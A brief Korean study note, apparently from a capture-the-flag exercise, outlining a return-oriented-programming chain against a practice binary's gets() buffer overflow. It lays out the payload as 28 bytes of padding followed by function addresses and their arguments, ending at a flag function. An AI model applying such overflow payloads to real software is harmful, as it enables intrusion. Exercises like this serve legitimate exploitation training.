rop chain

호출 순서 

main -> vuln -> win_function1 -> win_function2(0xBAAAAAAD) -> flag(0xDEADBAAD)

gets(buf) 후 스택 상태 

gets에 넣을 코드

dummy('a'*28) + win_function1 주소 + win_function2 주소 + flag 주소 + win_function2 인자(0xBAAAAAAD) + flag 인자(0xDEADBAAD)